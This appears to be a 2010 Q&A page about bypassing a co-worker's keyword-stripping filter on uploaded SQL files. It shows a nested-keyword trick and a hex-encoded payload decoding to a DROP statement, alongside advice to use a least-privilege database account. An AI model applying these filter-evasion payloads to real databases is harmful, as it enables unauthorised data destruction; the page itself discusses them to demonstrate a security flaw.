8

My co-worker is being unsafe with his code and is allowing a user to upload an SQL file to be run on the server. He strips out any key words in the file such as "EXEC", "DROP", "UPDATE", "INSERT", "TRUNC"

I want to show him the error of his ways by exploiting his EXEC ( @sql )

My first attempt will be with 'EXEXECEC (N''SELECT ''You DRDROPOPped the ball Bob!'')'

But he might filter that all out in a loop.

Is there a way I can exploit my co-worker's code? Or is filtering out the key words enough?

Edit: I got him to check in his code. If the code contains a keyword he does not execute it. I'm still trying to figure out how to exploit this using the binary conversion.

Improve this question
5
  • 1
    +1 For such an awesome question. We should exploit our co-workers more often. Commented Sep 16, 2010 at 22:32
  • Just give us the URL and log the uploads! Commented Sep 16, 2010 at 22:36
  • As for your first attempt: are you telling us your co-worker still tries to execute a piece of uploaded code after he found an EXEC there? Commented Sep 16, 2010 at 22:41
  • I'm not sure exactly how he does it at the moment. He forgot to add the files with the validation to subversion :( so I can't check up on him. Commented Sep 16, 2010 at 23:00
  • But yes, coders daft enough to think they get blacklist their way out of this situation quite often employ approaches like naïve stripping. Commented Sep 16, 2010 at 23:15

2 Answers 2

Reset to default
5

  1. Tell your co-worker he's a moron.

  2. Do an obfuscated SQL query, something like:

    select @sql = 0x44524f5020426f627350616e7473

This will need some tweaking depending on what the rest of the code looks like, but the idea is to encode your code in hex and execute it (or rather, let it be executed). There are other ways to obfuscate code to be injected.

You've got a huge security hole there. And the funny part is, this is not even something that needs to be reinvented. The proper way to stop such things from happening is to create and use an account with the correct permissions (eg: can only perform select queries on tables x, y and z).

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

he hee - just incase you didn't know that hex and when translated into ascii it translates to drop bobspants
Good call on the user account. That will solve his issue for sure.
1

Have a look at ASCII Encoded/Binary attacks ...

should convince your friend he is doomed.. ;)

And here some help on how to encode the strings ..
Converting a String to HEX in SQL

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.